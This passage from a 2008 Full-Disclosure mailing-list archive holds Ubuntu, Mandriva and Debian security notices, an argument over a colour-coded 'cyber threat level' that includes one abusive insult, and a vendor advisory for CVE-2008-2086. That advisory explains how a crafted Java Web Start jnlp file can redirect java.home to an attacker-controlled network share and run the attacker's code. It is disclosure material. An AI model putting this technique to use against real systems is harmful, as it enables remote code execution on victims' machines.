Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.5-1ubuntu1.3.diff.gz Size/MD5: 20231 02f6d6768115e61ecf3cb347e20a4d6b http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.5-1ubuntu1.3.dsc Size/MD5: 823 0acdf09ceaa643749b1d42a48b01a753 http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.5.orig.tar.gz Size/MD5: 1051780 aef00b2ff5c5413bd2a868299cabd69a Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.5-1ubuntu1.3_all.deb Size/MD5: 853248 3b839bfdfce5331f902838694df21039 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.6+dfsg-1ubuntu0.1.diff.gz Size/MD5: 20242 b0b2a251637b40ba30f2916b45629f33 http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.6+dfsg-1ubuntu0.1.dsc Size/MD5: 915 ca6ded2a6d1fe2175d01d996b0e3f590 http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.6+dfsg.orig.tar.gz Size/MD5: 1073578 6887d3f49de4f50830c0940041200632 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.6+dfsg-1ubuntu0.1_all.deb Size/MD5: 898120 cc9aa605fbe5455b2c0681ee4f3c7af1 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.7.dfsg-1ubuntu0.1.diff.gz Size/MD5: 23385 ab783d7817033c0240920e0d4aa6637c http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.7.dfsg-1ubuntu0.1.dsc Size/MD5: 1017 1e66b61f4a072905ab5039c9211fc7c8 http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.7.dfsg.orig.tar.gz Size/MD5: 1093568 98a5fad9c379ac4884d7af90db6e087b Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.7.dfsg-1ubuntu0.1_all.deb Size/MD5: 907832 a7c108e27112aa3ef21df347302dce36 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.7.dfsg-5ubuntu0.1.diff.gz Size/MD5: 28889 57d485dea3b40aadc924c81fa67666e4 http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.7.dfsg-5ubuntu0.1.dsc Size/MD5: 1530 c6dae34e2a0ac2d7036e45257e62f122 http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.7.dfsg.orig.tar.gz Size/MD5: 1093568 98a5fad9c379ac4884d7af90db6e087b Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.7.dfsg-5ubuntu0.1_all.deb Size/MD5: 908744 ca2b119c43f0943d1763348e10a599c6 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 235 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081203/13c10d12/attachment.bin From mike at technomonk.com Wed Dec 3 20:17:50 2008 From: mike at technomonk.com (Mike Preston) Date: Wed, 03 Dec 2008 20:17:50 +0000 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> Message-ID: <4936E96E.2030005@technomonk.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mike C wrote: | On Mon, Dec 1, 2008 at 5:27 PM, rholgstad wrote: |> and how does making a color based on these inputs protect people? |> | | Once all desktops have an icon or widget (say at the right hand | corner) with the color, and this is consistently seen everywhere, the | users will start associating with their online security. they will be | reminded that they have to be careful with the data they share. | | This, if implemented correctly will be a boon to security industry, | where the weakest kinks currently are 'n00b' users. | So if its condition green I can turn off my firewall and antivirus and surf risk free?! Whoo Hoo! Mike -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkk26W4ACgkQvhwPecbXDdyR8gCfZ5bbvwn01aRCcP5oqPE2GAT5 c+kAn3TAYtGY1o6ojoLXpDo7VIEQlTjn =Mskr -----END PGP SIGNATURE----- -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 6740 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081203/c9bfa627/attachment.bin From mike.cartall at gmail.com Thu Dec 4 02:43:01 2008 From: mike.cartall at gmail.com (Mike C) Date: Wed, 3 Dec 2008 18:43:01 -0800 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <49356766.9050307@gmail.com> Message-ID: On Tue, Dec 2, 2008 at 9:13 AM, Chris Jeane wrote: > If you are taking a proactive approach to security, maybe you should always > remind the user to be careful with their data. > How about 'all desktops have an icon or widget (say at the right hand > corner)' that flashes red every five minutes and says 'be careful with the > data you share.' This solution removes the overhead of all that pesky > monitoring and data mining. > This would be far more obtrusive than required. Not what would be the most effective. > The internet is a dangerous place, and will continue to be. My 'noob' > grandmother doesn't need a 1-5 Danger Scale to keep her from being scammed > when she buys holiday gifts online. [Grandmother Voice] 'Ohh dear we are at > Internet Danger Level: Tangerine, guess I can't order those knit socks for > Johnny today.' [End Grandmother Voice] > I hope you would thing a little bigger than that. Unfortunately, that is too much to hope for? -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ From mike.cartall at gmail.com Thu Dec 4 02:43:53 2008 From: mike.cartall at gmail.com (Mike C) Date: Wed, 3 Dec 2008 18:43:53 -0800 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <4936E96E.2030005@technomonk.com> References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <4936E96E.2030005@technomonk.com> Message-ID: On Wed, Dec 3, 2008 at 12:17 PM, Mike Preston wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Mike C wrote: > | On Mon, Dec 1, 2008 at 5:27 PM, rholgstad wrote: > |> and how does making a color based on these inputs protect people? > |> > | > | Once all desktops have an icon or widget (say at the right hand > | corner) with the color, and this is consistently seen everywhere, the > | users will start associating with their online security. they will be > | reminded that they have to be careful with the data they share. > | > | This, if implemented correctly will be a boon to security industry, > | where the weakest kinks currently are 'n00b' users. > | > So if its condition green I can turn off my firewall and antivirus and > surf risk free?! > If it ever does :)! With the current state of the industry, I dont think that time will come in the near future, -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ From mike.cartall at gmail.com Thu Dec 4 02:45:59 2008 From: mike.cartall at gmail.com (Mike C) Date: Wed, 3 Dec 2008 18:45:59 -0800 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <20081202192922.62A6C118041@smtp.hushmail.com> References: <20081202192922.62A6C118041@smtp.hushmail.com> Message-ID: On Tue, Dec 2, 2008 at 11:29 AM, Elazar Broad wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > > On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad > wrote: >>Mike C wrote: >>> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad >>wrote: >>> >>>> and how does making a color based on these inputs protect >>people? >>>> >>>> >>> >>> Once all desktops have an icon or widget (say at the right hand >>> corner) with the color, and this is consistently seen >>everywhere, the >>> users will start associating with their online security. they >>will be >>> reminded that they have to be careful with the data they share. >>> >>> This, if implemented correctly will be a boon to security >>industry, >>> where the weakest kinks currently are 'n00b' users. >>> >>> >>you are joking right? >> >>So some widget is going to stop the next SMB remote or IE client >>side >>and protect the 'n00b' users? Please explain how this works. Also >>please >>explain how "they will be reminded that they have to be careful >>with the >>data they share. " has anything to do with protecting a users >>machine >>from being compromised. > > Thats the whole point. There is a fine line between using visual > alerts to put people(Joe six pack) into a state of "awareness"(more > like mild hysteria) of a threat versus knowing how to protect > oneself against that threat and using that awareness indicator as > the kick in the ass to get moving and shore up the defenses(hell, > how many security folk do this too, then again, every time > something goes bump we see red). Visual alerts are great at > persuasion tools, especially when the goal is to get Joe to buy > your latest all-in-one-will-make-your-coffee-and-buy-you-beer > AV/Malware/Spyware/Foo(whats this doing here?)/evil monkey in the > closet package. So of course, Joe will never learn how to properly > defend his computer/data, and the "industry" will prosper. > I dont think it is a lost battle. This method could prove an excellent way to solve this age old problem. > Now, thanks to our good friends over at the DHS, the color system > has turned into a complete and utter joke(for the most part), so my > friend, you see, this a complete exercise in futility(besides the > fact that every friggin AV/IDS/Security/SIM company out there has > red, yellow and green as their corporate "flag", if you are just > joining the party, then you can completely ignore this) > DHS implementation leaves a lot to be desired. Please do not compare this to DHS's implementation. > If you really want to change state of security for the n00bs, > spread the knowledge, not the colors. > Thats what project Chroma is all about.. Are you on board?! -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ From mike.cartall at gmail.com Thu Dec 4 02:47:07 2008 From: mike.cartall at gmail.com (Mike C) Date: Wed, 3 Dec 2008 18:47:07 -0800 Subject: [Full-disclosure] News for Ureleet In-Reply-To: <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> Message-ID: Hye Guys, I though we had settled the issues offline. Lets restart our discussions.. this bickering is highly unnecessary on the list. -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ From mike.cartall at gmail.com Thu Dec 4 02:49:24 2008 From: mike.cartall at gmail.com (Mike C) Date: Wed, 3 Dec 2008 18:49:24 -0800 Subject: [Full-disclosure] Iran executes IT expert who spied for Israel In-Reply-To: <6158bb410812030655m3d8f88adj5a7c3f5084dad4c1@mail.gmail.com> References: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com> <4b6ee9310812030348m1bf5250cj45f0486c1bcb766@mail.gmail.com> <6158bb410812030655m3d8f88adj5a7c3f5084dad4c1@mail.gmail.com> Message-ID: On Wed, Dec 3, 2008 at 6:55 AM, Ureleet wrote: > hes not a troll andrew. he brings up good points. u nd i are the > only trolls here. i only troll u. you troll every1. > Yes, acceptance is he first stage of recovery for the both of you. Let us continue with the offline discussions. -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ From ghosts at gmail.com Thu Dec 4 03:23:34 2008 From: ghosts at gmail.com (ghost) Date: Wed, 3 Dec 2008 22:23:34 -0500 Subject: [Full-disclosure] News for Ureleet In-Reply-To: References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> Message-ID: <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com> Hey mike, how about you stop playing moderator you fucking douche bag. I for one believe netdev brings alot to this list and encourage him and ureleet to continue posting. On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote: > Hye Guys, > > I though we had settled the issues offline. Lets restart our > discussions.. this bickering is highly unnecessary on the list. > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From vulcanius at gmail.com Thu Dec 4 03:48:47 2008 From: vulcanius at gmail.com (vulcanius) Date: Wed, 3 Dec 2008 22:48:47 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <20081202192922.62A6C118041@smtp.hushmail.com> Message-ID: How exactly is a list of 5 colors going to educate the world about the need for, and proper implementation of, security measures? And be specific, stop with the vagueness already. On Wed, Dec 3, 2008 at 9:45 PM, Mike C wrote: > > Thats what project Chroma is all about.. Are you on board?! > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081203/4c6d46a9/attachment.html From luke.scharf at clusterbee.net Thu Dec 4 03:57:27 2008 From: luke.scharf at clusterbee.net (Luke Scharf) Date: Wed, 03 Dec 2008 21:57:27 -0600 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <20081202192922.62A6C118041@smtp.hushmail.com> Message-ID: <49375527.3070804@clusterbee.net> Mike C wrote: >> If you really want to change state of security for the n00bs, >> spread the knowledge, not the colors. >> >> > Thats what project Chroma is all about.. Are you on board?! > This already exists, backed up by some hard-core security competence: http://isc.sans.org/infocon.html http://isc.sans.org/ Has it changed the world? -Luke -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 3332 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081203/d05380c9/attachment.bin From advisories at vsecurity.com Thu Dec 4 04:13:54 2008 From: advisories at vsecurity.com (VSR Advisories) Date: Wed, 3 Dec 2008 20:13:54 -0800 Subject: [Full-disclosure] CVE-2008-2086: Java Web Start File Inclusion via System Properties Override Message-ID: <20081204041354.GK2478@sentinelchicken.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Java Web Start File Inclusion via System Properties Override Release Date: 2008-12-03 Application: Sun Java Runtime Environment / Java Web Start Versions: See below Severity: High Author: Timothy D. Morgan Vendor Status: Patch Released [3] CVE Candidate: CVE-2008-2086 Reference: http://www.vsecurity.com/bulletins/advisories/2008/JWS-props.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - ------------------- - From [1]: "Using Java Web Start technology, standalone Java software applications can be deployed with a single click over the network. Java Web Start ensures the most current version of the application will be deployed, as well as the correct version of the Java Runtime Environment (JRE)." Vulnerability Overview - ---------------------- On March 27th, VSR identified a vulnerability in Java Web Start related to the execution of privileged applications. This flaw could allow an attacker to execute arbitrary code on a victim system if a user could be convinced to visit a malicious web site. Product Background - ------------------ Java Web Start (JWS) applications are launched through specially formatted XML files hosted on web sites with a "jnlp" file extension. These files reference one or more "jar" files which are meant to be downloaded and executed by client systems. JWS applications are run in unprivileged mode by default but may be run with full user privileges if the jnlp file requests this access. Privileged JWS applications must have each jar file signed by the same trusted author in order to be executed. However, jnlp files are not signed and may be hosted by third-party web sites. In addition to specifying application components, the jnlp specification permits application authors to supply certain System properties which may be retrieved by the application through the System.getProperty() and System.getProperties() methods. Besides any user-supplied properties, the Java VM also provides access to a number of sensitive runtime settings through this interface. More information on the jnlp format may be found in [2]. Vulnerability Details - --------------------- VSR discovered an unsafe behavior in the way properties are interpreted when specified in jnlp files. In certain versions of the Java Runtime Engine (JRE), values supplied through jnlp files override existing system defaults. Thus far, VSR has verified the following System properties may be overridden: java.home java.ext.dirs user.home Of particular interest are the java.home and java.ext.dirs properties. If an attacker could lure a victim to open a malicious jnlp file which references a trusted application, it may be executed without any confirmation by the user. However, as the application attempts to load classes, it may trust the malicous java.home and/or java.ext.dirs value. These paths could point to a malicious local or remote JRE or extensions installation. It appears that under Windows, UNC network paths may be used for the java.home value. It is not yet known whether or not UNC paths may be used for java.ext.dirs. During testing, VSR found that Java Cryptography Extension (JCE) classes failed to load when java.home was set to an invalid path. However, by setting this path to network share which hosted a valid JRE installation, the JCE classes loaded correctly. If such a network share were hosted by the attacker, then arbitrary code could potentially be loaded without restrictions, unbeknownst to the victim. The following XML shows what a malicious jnlp file might look like. Note that the malicious jnlp file would likely be very similar to the ones users normally rely on with certain properties overriden in the resources section. Trusted Application Trusted Vendor Trusted Application by Trusted Vendor

To fully exploit this specific attack vector, an attacker would need to remotely or locally host a malicious version of classes used by a trusted application and then lure a user into opening a malicious jnlp file. A firewall installed between the attacker and victim could mitigate this issue if the victim's machine were restricted from accessing the hosted network share. Note that certain JWS applications may trust other System properties, such as user.home, and use them in ways which could be exploited in application-specific variants of this attack. Versions Affected - ----------------- During testing, VSR found the following JRE versions to be vulnerable: * 1.5.0_15 on Windows * 1.6.0 on Windows * 1.5.0_13-b05-237 on Mac OS X (distributed by Apple) Version 1.6.0_05 on Windows did not appear to be vulnerable. However, Sun recommends that any installations with the following versions be updated: * JDK and JRE 6 Update 10 and earlier * JDK and JRE 5.0 Update 16 and earlier * SDK and JRE 1.4.2_18 and earlier Sun reports that JRE 1.3.x is not affected, nor is JRE 6 Update 7 for Intel Itanium. For more information on versions affected and updates, see [3]. Vendor Response - --------------- The following timeline details Sun's response to the reported issue: 2008-03-28 Sun was provided a draft advisory. 2008-03-28 An initial response was received from Sun. 2008-04-11 Sun reported that the issue could not be reproduced. 2008-04-11 VSR provided Sun additional exploit details. 2008-04-29 Sun reported the issue was reproduced and assigned an internal issue tracking number of CR 6694892. 2008-12-03 Sun Alert 244988 was released with an associated security update. Sun Alert 244988 may be obtained at: http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1 Recommendation - -------------- Apply the JRE update as soon as possible. The issue is fixed in: * JDK and JRE 6 Update 11 or later * JDK and JRE 5.0 Update 17 or later * SDK and JRE 1.4.2_19 or later Review Sun Alert 244988 [3] for information on how to temporarily disable Java Web Start to work around this issue. Common Vulnerabilities and Exposures (CVE) Information - ------------------------------------------------------ The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2008-2086 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements - ---------------- Thanks to George Gal for assistance in testing. VSR would like to thank Sun for cooperating in the patch development process. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. Java Web Start Technology http://java.sun.com/products/javawebstart/ 2. Java Web Start Architecture JNLP Specification & API Documentation http://java.sun.com/products/javawebstart/download-spec.html 3. Sun Alert 244988 http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Copyright 2008 Virtual Security Research, LLC. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJN1kCQ1RSUNR+T+gRAl6TAJ9LmdTw8S4K3RMpgseiw/AkHUc81ACeK+pn cXqD3636+kFoMIUNlNhVZUw= =yv7u -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 4 04:16:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Wed, 03 Dec 2008 21:16:00 -0700 Subject: [Full-disclosure] [ MDVSA-2008:236 ] vim Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:236 http://www.mandriva.com/security/ _______________________________________________________________________ Package : vim Date : December 3, 2008 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Several vulnerabilities were found in the vim editor: A number of input sanitization flaws were found in various vim system functions. If a user were to open a specially crafted file, it would be possible to execute arbitrary code as the user running vim (CVE-2008-2712). Ulf H??rnhammar of Secunia Research found a format string flaw in vim's help tags processor. If a user were tricked into executing the helptags command on malicious data, it could result in the execution of arbitrary code as the user running vim (CVE-2008-2953). A flaw was found in how tar.vim handled TAR archive browsing. If a user were to open a special TAR archive using the plugin, it could result in the execution of arbitrary code as the user running vim (CVE-2008-3074). A flaw was found in how zip.vim handled ZIP archive browsing. If a user were to open a special ZIP archive using the plugin, it could result in the execution of arbitrary code as the user running vim (CVE-2008-3075). A number of security flaws were found in netrw.vim, the vim plugin that provides the ability to read and write files over the network. If a user opened a specially crafted file or directory with the netrw plugin, it could result in the execution of arbitrary code as the user running vim (CVE-2008-3076). A number of input validation flaws were found in vim's keyword and tag handling. If vim looked up a document's maliciously crafted tag or keyword, it was possible to execute arbitary code as the user running vim (CVE-2008-4101). A vulnerability was found in certain versions of netrw.vim where it would send FTP credentials stored for an FTP session to subsequent FTP sessions to servers on different hosts, exposing FTP credentials to remote hosts (CVE-2008-4677). This update provides vim 7.2 (patchlevel 65) which corrects all of these issues and introduces a number of new features and bug fixes. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2712 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2953 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3074 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3075 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3076 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4101 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4677 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 9687145d46a754a50f26498399e42f84 2008.0/i586/vim-common-7.2.065-9.2mdv2008.0.i586.rpm 5ab8b8d113ef693c07cd79f693d47638 2008.0/i586/vim-enhanced-7.2.065-9.2mdv2008.0.i586.rpm cf40227e84aac1a17a1a2973685e6a1f 2008.0/i586/vim-minimal-7.2.065-9.2mdv2008.0.i586.rpm bf9cb876e1958d7b215a7039e1c52975 2008.0/i586/vim-X11-7.2.065-9.2mdv2008.0.i586.rpm 7b1b039b2ba0233b6535775ecd200e6d 2008.0/SRPMS/vim-7.2.065-9.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: fa3479b036e054ce12a0e680e95f28f6 2008.0/x86_64/vim-common-7.2.065-9.2mdv2008.0.x86_64.rpm d1e10ebfaa89c3ca0cc72624531c6950 2008.0/x86_64/vim-enhanced-7.2.065-9.2mdv2008.0.x86_64.rpm a8961516b64c325bf6662b44e1384885 2008.0/x86_64/vim-minimal-7.2.065-9.2mdv2008.0.x86_64.rpm eb6a696807d8a2e55d9a447266081bc4 2008.0/x86_64/vim-X11-7.2.065-9.2mdv2008.0.x86_64.rpm 7b1b039b2ba0233b6535775ecd200e6d 2008.0/SRPMS/vim-7.2.065-9.2mdv2008.0.src.rpm Mandriva Linux 2008.1: bf1bbb5c11dc18f5b626830f83324bab 2008.1/i586/vim-common-7.2.065-9.2mdv2008.1.i586.rpm 54426458bb7601d9b3fdfedfa16ee9c6 2008.1/i586/vim-enhanced-7.2.065-9.2mdv2008.1.i586.rpm ca94206e37b639a4577272d05ef10489 2008.1/i586/vim-minimal-7.2.065-9.2mdv2008.1.i586.rpm 8b58cee3b8ccee24408c1ed78215cb89 2008.1/i586/vim-X11-7.2.065-9.2mdv2008.1.i586.rpm 2886ecd9e5117b6464dc82e12bc41ee6 2008.1/SRPMS/vim-7.2.065-9.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: f56a2879dfbca889824074338eca652c 2008.1/x86_64/vim-common-7.2.065-9.2mdv2008.1.x86_64.rpm e813a7a4126f4b5413b6a3517bb57c97 2008.1/x86_64/vim-enhanced-7.2.065-9.2mdv2008.1.x86_64.rpm cfc262ca8e4995d5b648c282d05f9261 2008.1/x86_64/vim-minimal-7.2.065-9.2mdv2008.1.x86_64.rpm dce8110e159fe8b767d596346514d1e9 2008.1/x86_64/vim-X11-7.2.065-9.2mdv2008.1.x86_64.rpm 2886ecd9e5117b6464dc82e12bc41ee6 2008.1/SRPMS/vim-7.2.065-9.2mdv2008.1.src.rpm Mandriva Linux 2009.0: b94e841258ba0053a8c2e1c61d378ff4 2009.0/i586/vim-common-7.2.065-9.2mdv2009.0.i586.rpm 53b66549200b5a8a3374de12c56ca3c4 2009.0/i586/vim-enhanced-7.2.065-9.2mdv2009.0.i586.rpm a412c994a7d9f3111e2dfd4d629de72c 2009.0/i586/vim-minimal-7.2.065-9.2mdv2009.0.i586.rpm f1a2096a8b72c74ed3ef7df984491b66 2009.0/i586/vim-X11-7.2.065-9.2mdv2009.0.i586.rpm 49185b01a1d717513902ba49235023a0 2009.0/SRPMS/vim-7.2.065-9.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: dce4c150ca5f8beed2e6ec917ee8f36d 2009.0/x86_64/vim-common-7.2.065-9.2mdv2009.0.x86_64.rpm 8351ee5ccbbf039649c830befb16c8b6 2009.0/x86_64/vim-enhanced-7.2.065-9.2mdv2009.0.x86_64.rpm 25abc823231a1242ec9e00e08aeea08b 2009.0/x86_64/vim-minimal-7.2.065-9.2mdv2009.0.x86_64.rpm 8f18e3bf52e528294a8c027227163ea0 2009.0/x86_64/vim-X11-7.2.065-9.2mdv2009.0.x86_64.rpm 49185b01a1d717513902ba49235023a0 2009.0/SRPMS/vim-7.2.065-9.2mdv2009.0.src.rpm Corporate 3.0: 57eb3da62007c67d4dfff2184712e723 corporate/3.0/i586/vim-common-7.2.065-9.2.C30mdk.i586.rpm cd32782aeb6a12ff17d63436cf1b5bdd corporate/3.0/i586/vim-enhanced-7.2.065-9.2.C30mdk.i586.rpm 5fe6219ae51f930a61ac7719d483c4d2 corporate/3.0/i586/vim-minimal-7.2.065-9.2.C30mdk.i586.rpm ad522f08a5c827dc68c1c3d80dc96c05 corporate/3.0/i586/vim-X11-7.2.065-9.2.C30mdk.i586.rpm 5056d9e1057c60b0cc2514cfb14f6aef corporate/3.0/SRPMS/vim-7.2.065-9.2.C30mdk.src.rpm Corporate 3.0/X86_64: 934038cf8d1a329cf8020895ed3db7c3 corporate/3.0/x86_64/vim-common-7.2.065-9.2.C30mdk.x86_64.rpm 65d64cc850ebdcb6a47905c94df19437 corporate/3.0/x86_64/vim-enhanced-7.2.065-9.2.C30mdk.x86_64.rpm 138427402ee4d0dba3931861f43b17af corporate/3.0/x86_64/vim-minimal-7.2.065-9.2.C30mdk.x86_64.rpm 23ab99b940c3150ea185cbe0cf7a536a corporate/3.0/x86_64/vim-X11-7.2.065-9.2.C30mdk.x86_64.rpm 5056d9e1057c60b0cc2514cfb14f6aef corporate/3.0/SRPMS/vim-7.2.065-9.2.C30mdk.src.rpm Corporate 4.0: ccad6e665824b0af02d7cf6dc244800f corporate/4.0/i586/vim-common-7.2.065-8.2.20060mlcs4.i586.rpm 6259e89fdff3af4591f00aee85f6408d corporate/4.0/i586/vim-enhanced-7.2.065-8.2.20060mlcs4.i586.rpm a1899ec82783d087a67e598440c7d97b corporate/4.0/i586/vim-minimal-7.2.065-8.2.20060mlcs4.i586.rpm 1628ebe4b6bd2c0398689d8b63059ad4 corporate/4.0/i586/vim-X11-7.2.065-8.2.20060mlcs4.i586.rpm ff5ce0745012df27dba7c628be9696c2 corporate/4.0/SRPMS/vim-7.2.065-8.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 2cc05e275dfda62016b2ca250bc7abac corporate/4.0/x86_64/vim-common-7.2.065-8.2.20060mlcs4.x86_64.rpm 12628db58e590955b4fc52b9b9da35f2 corporate/4.0/x86_64/vim-enhanced-7.2.065-8.2.20060mlcs4.x86_64.rpm 81d3a71d955ef44e9adf0087a38b2048 corporate/4.0/x86_64/vim-minimal-7.2.065-8.2.20060mlcs4.x86_64.rpm 01db91a3cd0d64fba00beb7ac29121ab corporate/4.0/x86_64/vim-X11-7.2.065-8.2.20060mlcs4.x86_64.rpm ff5ce0745012df27dba7c628be9696c2 corporate/4.0/SRPMS/vim-7.2.065-8.2.20060mlcs4.src.rpm Multi Network Firewall 2.0: 17e4eff8ebdba9763a278a2d0e2f4ca3 mnf/2.0/i586/vim-common-7.2.065-9.2.C30mdk.i586.rpm a32e43b8fd1beaa139c108a14685b357 mnf/2.0/i586/vim-enhanced-7.2.065-9.2.C30mdk.i586.rpm ccd9d76b31b85005d465a11113db862e mnf/2.0/i586/vim-minimal-7.2.065-9.2.C30mdk.i586.rpm 27bd018672a8bc5aa5d15a7bc6e64dc0 mnf/2.0/SRPMS/vim-7.2.065-9.2.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJNyr0mqjQ0CJFipgRAvZIAKCt0kqq89JAQAR+RIP90e6/NLuz/gCgsJpo KAmfiIoMaojFy7qpIqRnGw4= =Cl2x -----END PGP SIGNATURE----- From fw at deneb.enyo.de Thu Dec 4 08:26:17 2008 From: fw at deneb.enyo.de (Florian Weimer) Date: Thu, 04 Dec 2008 09:26:17 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1680-1] New clamav packages fix potential code execution Message-ID: 